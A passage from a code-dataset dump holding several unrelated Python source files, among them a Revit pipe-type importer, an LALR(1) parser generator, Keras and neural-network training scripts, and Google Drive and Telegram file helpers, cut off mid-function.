Autodesk.Revit.DB import DisplayUnitType\n\n LENGTH_UNIT = DisplayUnitType.DUT_MILLIMETERS\nelse:\n from Autodesk.Revit.DB import UnitTypeId\n\n LENGTH_UNIT = UnitTypeId.Millimeters\n\ndoc = __revit__.ActiveUIDocument.Document # type: Document\nlogger = script.get_logger()\n\n\ndef read_csv(csv_path):\n size_set = List[MEPSize]()\n with open(csv_path, \"rb\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\"\\t\")\n headers = next(reader)\n for row in reader:\n nominal_diameter = convert_to_internal(row[1])\n inner_diameter = convert_to_internal(row[2])\n outer_diameter = convert_to_internal(row[3])\n used_in_size_lists = True\n used_in_sizing = True\n mep_size = MEPSize(\n nominal_diameter,\n inner_diameter,\n outer_diameter,\n used_in_size_lists,\n used_in_sizing,\n )\n size_set.Add(mep_size)\n return size_set\n\n\ndef convert_to_internal(value, unit=\"mm\"):\n return UnitUtils.ConvertToInternalUnits(float(value), LENGTH_UNIT)\n\n\ncsv_path = forms.pick_file(file_ext=\"csv\")\n\nif csv_path:\n with revit.Transaction(\"Create PipeType from csv\"):\n name = forms.ask_for_string(\n default=\"ScheduleName\",\n prompt=\"Enter a schedule name eg. SDR6 or EN10217-1 serie 2\",\n title=\"PipeTypeCreation\",\n )\n schedule_id = PipeScheduleType.Create(doc, name).Id\n\n size_set = read_csv(csv_path)\n\n materials = [\n (material.Name, material.Id)\n for material in FilteredElementCollector(doc).OfClass(Material)\n ]\n material = forms.SelectFromList.show(\n materials,\n multiselect=False,\n button_name=\"Select material\",\n title=\"PipeTypeCreation\",\n )\n if material:\n material_id = material[1]\n else:\n name = forms.ask_for_string(\n default=\"MaterialName\",\n prompt=\"Enter a new material name eg. PP-R or Steel\",\n title=\"PipeTypeCreation\",\n )\n material_id = Material.Create()\n PipeSegment.Create(doc, material_id, schedule_id, size_set)\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Create.panel/BatchCreation.pulldown/PipeTypeFromCSV.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"30731023167","text":"import pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\n\n# Load Data\ndata = pd.read_csv(\"data/data_ready.csv\", index_col=[0])\ndata_tfidf = data[[\"screen_name\", \"description\", \"name\",'location']]\ndata_tfidf = data_tfidf.fillna(\" \")\ndata_tfidf = (\n data_tfidf[\"screen_name\"]\n + \"//\"\n + data_tfidf[\"description\"]\n + \"//\"\n + data_tfidf[\"name\"]\n + \"//\"\n + data_tfidf[\"location\"]\n)\nX = list(data_tfidf.values)\n\n\nmodel = SentenceTransformer(\"distiluse-base-multilingual-cased\")\nembeddings = model.encode(X, show_progress_bar=True)\nnp.save(\"embeddings/bert.npy\", embeddings)\n","repo_name":"medialab/graines","sub_path":"pipeline ML/_bert_embedder.py","file_name":"_bert_embedder.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6005567877","text":"import re\n\nimport requests\n\nimport pyminflux\n\n\ndef check_for_updates():\n \"\"\"Check for pyMINFLUX updates.\n\n Returns\n -------\n\n code: int\n Success code:\n -1: something went wrong retrieving version information.\n 0: there are no new versions.\n 1: there is a new version.\n version: str\n Version on the server (in the format x.y.z). Set if code is 0 or 1.\n error: str\n Error message. Only set if code is -1.\n \"\"\"\n\n # Initialize outputs\n code = -1\n version = \"\"\n error = \"\"\n\n # Get the redirect from the latest release URL\n response = requests.get(\n \"https://github.com/bsse-scf/pyMINFLUX/releases/latest\", allow_redirects=False\n )\n\n # This should redirect (status code 301 or 302)\n if response.status_code in (301, 302):\n redirect_url = response.headers[\"Location\"]\n else:\n error = \"Could not check for updates!\"\n return code, version, error\n\n # Try retrieving the version string\n match = re.search(r\"\\b(\\d+)\\.(\\d+)\\.(\\d+)$\", redirect_url)\n if match:\n x, y, z = match.groups()\n else:\n error = \"Could not retrieve version information from server!\"\n return code, version, error\n\n # Set the version\n version = f\"{x}.{y}.{z}\"\n\n # Transform new version into an integer\n new_version = 10000 * int(x) + 100 * int(y) + int(z)\n\n # Current version\n parts = pyminflux.__version__.split(\".\")\n\n # Make sure that we have three parts\n if len(parts) != 3:\n error = \"Could not retrieve current app information!\"\n return code, version, error\n\n # Transform current version into an integer\n current_version = 10000 * int(parts[0]) + 100 * int(parts[1]) + int(parts[2])\n\n # Now check\n if new_version > current_version:\n code = 1\n else:\n code = 0\n\n # Return\n return code, version, error\n\n\ndef intersect_2d_ranges(first_range, second_range):\n \"\"\"Intersect two 1D ranges (min, max) to get the combined results of two consecutive filtering events.\"\"\"\n out_range = (\n max(first_range[0], second_range[0]),\n min(first_range[1], second_range[1]),\n )\n return out_range\n","repo_name":"bsse-scf/pyMINFLUX","sub_path":"pyminflux/utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"33105698584","text":"import unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom nuvla.job.distribution import DistributionBase\nfrom nuvla.job.distributions.handle_trial_end import \\\n HandleTrialEndJobsDistribution, \\\n build_filter_customers\n\n\nclass TestHandleTrialEndJobsDistribution(unittest.TestCase):\n\n def setUp(self):\n self.patcher = patch.object(DistributionBase, '_start_distribution')\n self.mock_object = self.patcher.start()\n\n def tearDown(self):\n self.patcher.stop()\n\n @patch.object(HandleTrialEndJobsDistribution, 'list_trials')\n def test_list_customer_ids(self, mock_list_trials):\n obj = HandleTrialEndJobsDistribution(MagicMock())\n mock_list_trials.return_value = []\n trial_1 = {'id': 'sub_1',\n 'customer': 'cus_1'}\n trial_2 = {'id': 'sub_2',\n 'customer': 'cus_2'}\n self.assertListEqual(\n [], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1]\n self.assertListEqual(\n ['cus_1'], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1, trial_2]\n self.assertListEqual(\n ['cus_1', 'cus_2'], obj.list_customer_ids())\n mock_list_trials.return_value = [trial_1, trial_2, {}]\n self.assertListEqual(\n ['cus_1', 'cus_2'], obj.list_customer_ids(),\n 'should not fail even if trials is missing ids')\n\n def test_build_filter_customers(self):\n self.assertEqual(\n '(customer-id=\"1\" or customer-id=\"2\" or customer-id=\"3\")',\n build_filter_customers(['1', '2', '3']))\n\n @patch.object(HandleTrialEndJobsDistribution, 'search_customers')\n @patch('nuvla.job.distributions.handle_trial_end.build_filter_customers')\n def test_get_customers(self,\n mock_build_filter_customers,\n mock_search_customers):\n obj = HandleTrialEndJobsDistribution(MagicMock())\n trial_1 = {'id': '1'}\n trial_2 = {'id': '2'}\n customer_1 = {'id': 'customer/1'}\n customer_2 = {'id': 'customer/2'}\n\n mock_build_filter_customers.return_value = ''\n obj._trials = [trial_2]\n self.assertListEqual([], obj.get_customers(),\n 'search customers without filter is not executed')\n\n mock_build_filter_customers.return_value = 'subscription-id=\"2\"'\n mock_search_customers.return_value = [customer_2]\n self.assertListEqual([customer_2], obj.get_customers())\n\n obj._trials = [trial_1, trial_2]\n mock_search_customers.return_value = [customer_1, customer_2]\n self.assertListEqual([customer_1, customer_2],\n obj.get_customers())\n","repo_name":"nuvla/job-engine","sub_path":"code/tests/nuvla/job/distributions/handle_trial_end_test.py","file_name":"handle_trial_end_test.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17372999647","text":"from collections import deque\nfrom collections import OrderedDict\nfrom pprint import pprint\nimport firstfollow\nfrom firstfollow import production_list, nt_list as ntl, t_list as tl\nimport string_validating\nimport sys\n\nnt_list, t_list=[], []\nfinal=[]\n\n\n\nclass State:\n\t_id=0\n\tdef __init__(self, closure):\n\t\tself.closure=closure\n\t\tself.no=State._id\n\t\tState._id+=1\n\nclass Item(str):\n\tdef __new__(cls, item, lookahead=list()):\n\t\tself=str.__new__(cls, item)\n\t\tself.lookahead=lookahead\n\t\treturn self\n\n\tdef __str__(self):\n\t\treturn super(Item, self).__str__()+\", \"+'|'.join(self.lookahead)\n\t\t\n\ndef closure(items): #just make new produces sentences, items= closure\n\n\tdef exists(newitem, items):\n\t\tfor i in items:\n\t\t\tif i==newitem and sorted(set(i.lookahead))==sorted(set(newitem.lookahead)):\n\t\t\t\treturn True\n\t\treturn False\n\n\n\tglobal production_list\n\n\twhile True:\n\t\tflag=0\n\t\tfor i in items:\t\n\t\t\t\n\t\t\tif i.index('.')==len(i)-1: continue\n\n\t\t\tY=i.split('->')[1].split('.')[1][0]\t\t\t# \n\n\t\t\tif i.index('.')+1')\n\t\t\t\t\n\t\t\t\tif head!=Y: continue\n\t\t\t\t\n\t\t\t\tnewitem=Item(Y+'->.'+body, lastr)\n\n\t\t\t\tif not exists(newitem, items):\n\t\t\t\t\titems.append(newitem)\n\t\t\t\t\tflag=1\n\t\tif flag==0: break\n\n\treturn items\n\ndef goto(items, symbol):\t\t\t# move ' . ' one further\n\n\tglobal production_list\n\tinitial=[]\n\n\tfor i in items:\n\t\tif i.index('.')==len(i)-1: continue\n\n\t\thead, body=i.split('->')\n\t\tseen, unseen=body.split('.')\n\n\n\t\tif unseen[0]==symbol and len(unseen) >= 1:\n\t\t\tinitial.append(Item(head+'->'+seen+unseen[0]+'.'+unseen[1:], i.lookahead))\n\n\treturn closure(initial)\n\n\ndef calc_stateslalr1():\n\tglobal final\n\tdef contains(states, t):\n\n\t\tfor s in states:\n\t\t\tif len(s) != len(t): continue\n\n\t\t\tif sorted(s)==sorted(t):\n\t\t\t\tfor i in range(len(s)):\n\t\t\t\t\ts[i].lookahead = list(set(s[i].lookahead + t[i].lookahead))\n\t\t\t\t\t# print(s[i].lookahead)\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tglobal production_list, nt_list, t_list\n\n\thead, body=production_list[0].split('->')\n\n\n\tstates=[closure([Item(head+'->.'+body, ['$'])])]\n\t\n\twhile True:\n\t\tflag=0\n\t\tfor s in states:\n\n\t\t\tfor e in nt_list+t_list:\n\t\t\t\t\n\t\t\t\tt=goto(s, e)\n\t\t\t\tif t == [] or contains(states, t): continue\n\n\t\t\t\tstates.append(t)\n\t\t\t\tflag=1\n\n\t\tif not flag: break\n\t\n\treturn states \n\ndef make_tablelalr1(states):\n\n\tglobal nt_list, t_list\n\n\tdef getstateno(t):\n\n\t\tfor s in states:\n\t\t\tif len(s.closure) != len(t): continue\n\n\t\t\tif sorted(s.closure)==sorted(t):\n\t\t\t\treturn s.no\n\n\t\treturn -1\n\n\tdef getprodno(closure):\n\n\t\tclosure=''.join(closure).replace('.', '')\n\t\treturn production_list.index(closure)\n\n\tSLR_Table=OrderedDict()\n\t\n\tfor i in range(len(states)):\n\t\tstates[i]=State(states[i])\n\n\tfor s in states:\n\t\tSLR_Table[s.no]=OrderedDict()\n\n\t\tfor item in s.closure:\n\t\t\thead, body=item.split('->')\n\t\t\tif body=='.': \n\t\t\t\tfor term in item.lookahead: \n\t\t\t\t\tif term not in SLR_Table[s.no].keys():\n\t\t\t\t\t\tSLR_Table[s.no][term]={'r'+str(getprodno(item))}\n\t\t\t\t\telse: SLR_Table[s.no][term] |= {'r'+str(getprodno(item))}\n\t\t\t\tcontinue\n\n\t\t\tnextsym=body.split('.')[1]\n\t\t\tif nextsym=='':\n\t\t\t\tif getprodno(item)==0:\n\t\t\t\t\tSLR_Table[s.no]['$']='accept'\n\t\t\t\telse:\n\t\t\t\t\tfor term in item.lookahead: \n\t\t\t\t\t\tif term not in SLR_Table[s.no].keys():\n\t\t\t\t\t\t\tSLR_Table[s.no][term]={'r'+str(getprodno(item))}\n\t\t\t\t\t\telse: SLR_Table[s.no][term] |= {'r'+str(getprodno(item))}\n\t\t\t\tcontinue\n\n\t\t\tnextsym=nextsym[0]\n\t\t\tt=goto(s.closure, nextsym)\n\t\t\tif t != []: \n\t\t\t\tif nextsym in t_list:\n\t\t\t\t\tif nextsym not in SLR_Table[s.no].keys():\n\t\t\t\t\t\tSLR_Table[s.no][nextsym]={'s'+str(getstateno(t))}\n\t\t\t\t\telse: SLR_Table[s.no][nextsym] |= {'s'+str(getstateno(t))}\n\n\t\t\t\telse: SLR_Table[s.no][nextsym] = str(getstateno(t))\n\tfor st in SLR_Table:\n\t# print(dict(SLR_Table[st]))\n\t\tfinal.append(dict(SLR_Table[st]))\n\treturn SLR_Table\n\ndef augment_grammar():\n\n\t#for i in range(ord('Z'), ord('A')-1, -1):\n#\t\tif chr(i) not in nt_list:\n#\t\t\tstart_prod=production_list[0]\n#\t\t\tproduction_list.insert(0, chr(i)+'->'+start_prod.split('->')[0]) \n#\t\t\treturn\n\tproduction_list.insert(0, \"S'\"+'->'+production_list[0].split('->')[0]) \n\ndef main():\n\n\tglobal production_list, ntl, nt_list, tl, t_list\t\n\n\tfirstfollow.main()\n\n\t# print(\"\\tFIRST AND FOLLOW OF NON-TERMINALS\")\n\t# for nt in ntl:\n\t# \tfirstfollow.compute_first(nt)\n\t# \tfirstfollow.compute_follow(nt)\n\t# \tprint(nt)\n\t# \tprint(\"\\tFirst:\\t\", firstfollow.get_first(nt))\n\t# \tprint(\"\\tFollow:\\t\", firstfollow.get_follow(nt), \"\\n\")\t\n\t\n\n\taugment_grammar()\n\tnt_list=list(ntl.keys())\n\tt_list=list(tl.keys()) + ['$']\n\n\t# print(nt_list)\n\t# print(t_list)\n\n\tj=calc_stateslalr1()\n\n\t# ctr=0\n\t# for s in j:\n\t# \t# print(\"Item{}:\".format(ctr))\n\t# \tfor i in s:\n\t# \t\t# print(\"\\t\", i)\n\t# \tctr+=1\n\n\ttable=make_tablelalr1(j)\n\t# print(\"table \")\n\n\tprint(\"\\n===== TABLE =====\\n\")\n\n\tsr, rr=0, 0\n\n\tfor i, j in table.items():\n\t\t# print(i, \"\\t\", j)\n\t\ts, r=0, 0\n\n\t\tfor p in j.values():\n\t\t\tif p!='accept' and len(p)>1:\n\t\t\t\tp=list(p)\n\t\t\t\tif('r' in p[0]): r+=1\n\t\t\t\telse: s+=1\n\t\t\t\tif('r' in p[1]): r+=1\n\t\t\t\telse: s+=1\t\t\n\t\tif r>0 and s>0: sr+=1\n\t\telif r>0: rr+=1\n\n\n\n\n\n\t# sys.stdout.write('.')\n\tsys.stdout.write(\"\\t{}\\t{}\\n\".format('\\t'.join(t_list), '\\t'.join(nt_list)))\n\n\tfor i, j in table.items():\n\t\t\tsys.stdout.write(\"\\n{}\\t\".format(i))\n\t\t\tfor sym in t_list+nt_list:\n\t\t\t\tif sym in table[i].keys():\n\t\t\t\t\tif type(table[i][sym])!=type(set()): \n\t\t\t\t\t\tsys.stdout.write(\"{}\\t\".format(table[i][sym]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tsys.stdout.write(\"{}\\t\".format(', '.join(table[i][sym])))\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(\"\\t\")\n\t\t\tsys.stdout.write(\"\\n\")\n\t\t\ts, r=0, 0\n\n\t\t\tfor p in j.values():\n\t\t\t\tif p!='accept' and len(p)>1:\n\t\t\t\t\tp=list(p)\n\t\t\t\t\tif('r' in p[0]): r+=1\n\t\t\t\t\telse: s+=1\n\t\t\t\t\tif('r' in p[1]): r+=1\n\t\t\t\t\telse: s+=1\t\t\n\t\t\tif r>0 and s>0: sr+=1\n\t\t\telif r>0: rr+=1\n\n\tprint(\"\\n\\n\", sr, \"s/r conflicts |\", rr, \"r/r conflicts\\n\")\n\n\n\n\n\n\treturn \n\nif __name__==\"__main__\":\n\tmain()\n\tinString=input(\"please enter your string to validate : \")\n\tstring_validating.validation(firstfollow.production_list, final, inString+\"$\")\n\n\t\n\n\n\n","repo_name":"kjjam/Compiler1397","sub_path":"lalr1_backend_only.py","file_name":"lalr1_backend_only.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32224876828","text":"import pickle\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport numpy as np\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# command line flags\nflags.DEFINE_string('training_file', '', \"Bottleneck features training file (.p)\")\nflags.DEFINE_string('validation_file', '', \"Bottleneck features validation file (.p)\")\n\n\ndef load_bottleneck_data(training_file, validation_file):\n \"\"\"\n Utility function to load bottleneck features.\n\n Arguments:\n training_file - String\n validation_file - String\n \"\"\"\n print(\"Training file\", training_file)\n print(\"Validation file\", validation_file)\n\n with open(training_file, 'rb') as f:\n train_data = pickle.load(f)\n with open(validation_file, 'rb') as f:\n validation_data = pickle.load(f)\n\n X_train = train_data['features']\n y_train = train_data['labels']\n X_val = validation_data['features']\n y_val = validation_data['labels']\n\n return X_train, y_train, X_val, y_val\n\n\ndef main(_):\n # load bottleneck data\n X_train, y_train, X_val, y_val = load_bottleneck_data(FLAGS.training_file, FLAGS.validation_file)\n \n X_train=X_train.squeeze()\n y_train=y_train.squeeze()\n X_val=X_val.squeeze()\n y_val=y_val.squeeze()\n \n num_classes = len(np.unique(y_train))\n input_shape = X_train.shape[1:]\n \n print(X_train.shape, y_train.shape)\n print(X_val.shape, y_val.shape)\n\n dropout = .3\n batch_size = 128\n epochs = 500\n \n model = Sequential()\n model.add(Dense(256, activation='relu',input_shape=input_shape))\n model.add(Dropout(dropout))\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(dropout))\n model.add(Dense(84, activation='relu'))\n model.add(Dropout(dropout))\n model.add(Dense(num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.sparse_categorical_crossentropy,\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n\n\n from keras.callbacks import EarlyStopping\n early_stopping = EarlyStopping(monitor='val_loss', patience=30)\n\n model.fit(X_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_split=.3, \n callbacks=[early_stopping])\n \n score = model.evaluate(X_val, y_val, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n import gc; gc.collect()\n \n \n# parses flags and calls the `main` function above\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"lfiaschi/udacity-transfer-learning-lab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38266926176","text":"import math\nimport numpy as np\nclass Neuron:\n def __init__(self, lr, actFunc, betaValue):\n self.weight = np.zeros(0)\n self.lr = lr\n self.actFunc = actFunc\n self.inputs = [] #default value\n self.target = 0 #default value\n self.sum = 0\n self.betaValue = betaValue\n self.error = 0\n\n def initNeuronWeight(self, inputs):\n self.weight = np.random.rand(inputs.shape[0] + 1)\n\n def setInput(self, inputs):\n self.inputs = inputs\n self.inputs = np.insert(self.inputs, 0, -1)\n\n def setTarget(self, target):\n self.target = target\n\n\n def activationFunc(self, sum):\n if self.actFunc == \"heaviside\":\n if sum >= 0:\n return 1.0\n else:\n return 0.0\n if self.actFunc == \"logistic\":\n beta = self.betaValue\n if -beta*sum > 450:\n return 1/(1+math.exp(450))\n return 1/(1+math.exp(-beta*sum))\n if self.actFunc == \"sign\":\n if sum >= 0:\n return 1.0\n else:\n return -1.0\n if self.actFunc == \"relu\":\n return max(0,sum)\n if self.actFunc == \"sin\":\n return math.sin(sum)\n if self.actFunc == \"tanh\":\n return math.tanh(sum)\n if self.actFunc == \"leaky relu\":\n if sum > 0:\n return sum\n else :\n return 0.01*sum\n\n \n def derivativeActFunc(self, sum):\n if self.actFunc == \"heaviside\":\n return 1.0\n if self.actFunc == \"logistic\":\n beta = self.betaValue\n if -beta*sum > 300:\n phi = 1/(1+math.exp(300))\n else:\n phi = 1/(1+math.exp(-beta*sum))\n\n return beta*phi*(1-phi)\n if self.actFunc == \"sign\":\n return 1.0\n if self.actFunc == \"relu\":\n if sum >= 0:\n return 1.0\n else:\n return 0.0\n if self.actFunc == \"sin\":\n return math.cos(sum)\n if self.actFunc == \"tanh\":\n return math.pow(1/(math.cosh(sum)),2)\n if self.actFunc == \"leaky relu\":\n if sum > 0:\n return 1\n else :\n return 0.01\n\n #Return the output y\n def prediction(self):\n self.sum = 0\n for i in range(len(self.inputs)):\n self.sum += self.inputs[i]*self.weight[i]\n\n \n return self.activationFunc(self.sum)\n\n def train(self):\n prediction = self.prediction()\n error = self.target - prediction\n\n for i in range(len(self.weight)):\n self.weight[i] += error * self.inputs[i] * self.lr * self.derivativeActFunc(self.sum)\n\n def computeErrorOutput(self):\n prediction = self.prediction()\n self.error = self.derivativeActFunc(self.sum)*(self.target - prediction)\n return self.error\n\n\n def computeError(self, previousErrors, previousWeights):\n prediction = self.prediction() #keep this, to compute self.sum !!\n\n weightedErrors = 0\n for i in range(len(previousErrors)):\n weightedErrors += previousWeights[i]*previousErrors[i] \n\n self.error = self.derivativeActFunc(self.sum)*weightedErrors\n return self.error\n \n def updateWeights(self):\n for i in range(1,len(self.weight)):\n self.weight[i] += self.lr * self.inputs[i] * self.error\n\n\n\n\n\n ","repo_name":"SonTonyD/Lodz_IA_introduction","sub_path":"Task3/Neuron_3.py","file_name":"Neuron_3.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14613858404","text":"\nclass Institution(object):\n\n def __init__(self,name,location,keywords,workers,cooperate_institutions):\n self.name = name\n self.location = location\n self.keywords = keywords\n self.workers = workers\n self.cooperate_institutions = cooperate_institutions\n\n\nclass Expert(object):\n\n def __init__(self,name,keywords,cooperate_experts):\n self.name = name\n self.keywords = keywords\n self.cooperate_workers = cooperate_experts","repo_name":"sgc1993/InfomationAnalyze","sub_path":"entity/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14479979787","text":"import cv2\nfrom SinGAN.functions import np2torch\nimport torch\n\nfilePath=\"./input.tif\"\nfolderPath=\"./\"\n\nim1 = cv2.imread(filePath)\nh= im1.shape[0]\nw= im1.shape[1]\nprint(h,w)\nimb= cv2.resize(im1,(w//3,h//3), interpolation= cv2.INTER_CUBIC)\n\ncv2.imwrite(folderPath+\"input_lr.jpg\",imb)\n#cv2.imwrite(folderPath+\"lr_nearest.jpg\",imnn)\nexit()\nim1=imb\n\nim1 = im1/255\n\nimt= torch.from_numpy(im1)\nimt = imt.type(torch.FloatTensor)\nprint(imt)\nalpha=0.1\nimt= imt + alpha*torch.randn(imt.shape)\nimt= imt.clamp(0,1)\nimt= imt*255\nimt = imt.int()\nprint(imt)\nimtnp= imt.numpy()\ncv2.imwrite(folderPath+\"lr_noisy_\"+str(alpha)+\".png\",imtnp)\nprint(im1.shape)\n\n","repo_name":"tanmay2625/re-singan","sub_path":"add_noise.py","file_name":"add_noise.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3904185697","text":"import os\r\nimport shutil\r\nimport io\r\nimport pickle\r\nimport telegram\r\nfrom re import search as re_search\r\nfrom urllib.parse import parse_qs, urlparse\r\nfrom os import makedirs, path as ospath, listdir, remove as osremove\r\nfrom googleapiclient.discovery import build\r\nfrom googleapiclient.errors import HttpError\r\nfrom googleapiclient.http import MediaIoBaseDownload\r\n\r\n\r\n# =================================================================\r\n# G Drive Functions\r\n# =================================================================\r\n\r\n\r\n# extract the file ID or folder ID from the link\r\ndef __getIdFromUrl(link: str):\r\n if \"folders\" in link or \"file\" in link:\r\n regex = r\"https:\\/\\/drive\\.google\\.com\\/(?:drive(.*?)\\/folders\\/|file(.*?)?\\/d\\/)([-\\w]+)\"\r\n res = re_search(regex, link)\r\n if res is None:\r\n raise IndexError(\"G-Drive ID not found.\")\r\n return res.group(3)\r\n parsed = urlparse(link)\r\n return parse_qs(parsed.query)[\"id\"][0]\r\n\r\n\r\ndef __getFilesByFolderId(folder_id):\r\n page_token = None\r\n files = []\r\n while True:\r\n response = (\r\n service.files()\r\n .list(\r\n supportsAllDrives=True,\r\n includeItemsFromAllDrives=True,\r\n q=f\"'{folder_id}' in parents and trashed = false\",\r\n spaces=\"drive\",\r\n pageSize=200,\r\n fields=\"nextPageToken, files(id, name, mimeType, size, shortcutDetails)\",\r\n orderBy=\"folder, name\",\r\n pageToken=page_token,\r\n )\r\n .execute()\r\n )\r\n files.extend(response.get(\"files\", []))\r\n page_token = response.get(\"nextPageToken\")\r\n if page_token is None:\r\n break\r\n return files\r\n\r\n\r\ndef __getFileMetadata(file_id):\r\n return (\r\n service.files()\r\n .get(fileId=file_id, supportsAllDrives=True, fields=\"name, id, mimeType, size\")\r\n .execute()\r\n )\r\n\r\n\r\ndef __download_file(file_id, path):\r\n # Check if the specified file or folder exists and is downloadable.\r\n try:\r\n file = service.files().get(fileId=file_id, supportsAllDrives=True).execute()\r\n except HttpError as error:\r\n print(\"An error occurred: {0}\".format(error))\r\n file = None\r\n if file is None:\r\n print(\r\n \"Sorry, the specified file or folder does not exist or is not accessible.\"\r\n )\r\n else:\r\n if file[\"mimeType\"].startswith(\"application/vnd.google-apps\"):\r\n print(\r\n \"Sorry, the specified ID is for a Google Docs, Sheets, Slides, or Forms document. You can only download these types of files in specific formats.\"\r\n )\r\n else:\r\n # Create a BytesIO stream to hold the downloaded file data.\r\n file_contents = io.BytesIO()\r\n\r\n # Download the file or folder contents to the BytesIO stream.\r\n request = service.files().get_media(fileId=file_id, supportsAllDrives=True)\r\n file_downloader = MediaIoBaseDownload(file_contents, request)\r\n done = False\r\n while done is False:\r\n status, done = file_downloader.next_chunk()\r\n # print(f\"\\rDownload progress: {int(status.progress() * 100)}%\")\r\n file_contents.seek(0)\r\n\r\n # Save the downloaded file or folder to disk using its original name (if available).\r\n file_name = file.get(\"name\", f\"untitleddrivefile_{file_id}\")\r\n file_name = os.path.join(path, file_name)\r\n with open(file_name, \"wb\") as handle:\r\n handle.write(file_contents.getbuffer())\r\n print(f'\\nThe file \"{file_name}\" downloaded!')\r\n\r\n\r\n# Usage example\r\n# __download_file('1XQyVFHC44zso-HM2-EyLm8YeusxcqNOX', '/content/Downloads')\r\n\r\n\r\ndef __download_folder(folder_id, path):\r\n\r\n folder_meta = __getFileMetadata(folder_id)\r\n folder_name = folder_meta[\"name\"]\r\n if not ospath.exists(f\"{path}/{folder_name}\"):\r\n makedirs(f\"{path}/{folder_name}\")\r\n path += f\"/{folder_name}\"\r\n result = __getFilesByFolderId(folder_id)\r\n if len(result) == 0:\r\n return\r\n result = sorted(result, key=lambda k: k[\"name\"])\r\n for item in result:\r\n file_id = item[\"id\"]\r\n shortcut_details = item.get(\"shortcutDetails\")\r\n if shortcut_details is not None:\r\n file_id = shortcut_details[\"targetId\"]\r\n mime_type = shortcut_details[\"targetMimeType\"]\r\n else:\r\n mime_type = item.get(\"mimeType\")\r\n if mime_type == \"application/vnd.google-apps.folder\":\r\n __download_folder(file_id, path)\r\n else:\r\n __download_file(file_id, path)\r\n\r\n\r\n# =================================================================\r\n# Telegram Upload Functions\r\n# =================================================================\r\n\r\n\r\ndef get_file_type(file_path):\r\n name, extension = os.path.splitext(file_path)\r\n if extension in [\".mp4\", \".avi\", \".mkv\", \".mov\", \".webm\", \".m4v\"]:\r\n video_extension_fixer(file_path)\r\n return \"video\"\r\n elif extension in [\".mp3\", \".wav\", \".flac\", \".aac\", \".ogg\"]:\r\n return \"audio\"\r\n elif extension in [\".jpg\", \".jpeg\", \".png\", \".gif\"]:\r\n return \"photo\"\r\n else:\r\n return \"document\"\r\n\r\n\r\ndef video_extension_fixer(file_path):\r\n\r\n dir_path, filename = os.path.split(file_path)\r\n\r\n if filename.endswith(\".mp4\") or filename.endswith(\".mkv\"):\r\n pass\r\n # split the file name and the extension\r\n else:\r\n # rename the video file with .mp4 extension\r\n name, ext = os.path.splitext(filename)\r\n os.rename(\r\n os.path.join(dir_path, filename), os.path.join(dir_path, name + \".mp4\")\r\n )\r\n print(f\"{filename} was changed to {name}.mp4\")\r\n\r\n\r\ndef create_zip(folder_path):\r\n folder_name = os.path.basename(folder_path) # get folder name from folder path\r\n zip_file_path = folder_path # create zip file path\r\n shutil.make_archive(\r\n zip_file_path, \"zip\", folder_path\r\n ) # create zip file by archiving the folder\r\n return zip_file_path + \".zip\" # return zip file path\r\n\r\n\r\ndef size_checker(file_path):\r\n\r\n max_size = 2097152000 # 2 GB\r\n file_size = os.stat(file_path).st_size\r\n\r\n if file_size > max_size:\r\n\r\n if not ospath.exists(d_fol_path):\r\n makedirs(d_fol_path)\r\n\r\n split_zipFile(file_path, max_size)\r\n\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef split_zipFile(file_path, max_size):\r\n\r\n dir_path, filename = os.path.split(file_path)\r\n\r\n new_path = f\"{d_fol_path}/{filename}\"\r\n\r\n with open(file_path, \"rb\") as f:\r\n chunk = f.read(max_size)\r\n i = 1\r\n\r\n while chunk:\r\n # Generate filename for this chunk\r\n ext = str(i).zfill(3)\r\n output_filename = \"{}.{}\".format(new_path, ext)\r\n\r\n # Write chunk to file\r\n with open(output_filename, \"wb\") as out:\r\n out.write(chunk)\r\n\r\n # Get next chunk\r\n chunk = f.read(max_size)\r\n\r\n # Increment chunk counter\r\n i += 1\r\n\r\n\r\nasync def upload_file(file_path, type, file_name):\r\n\r\n # Upload the file\r\n 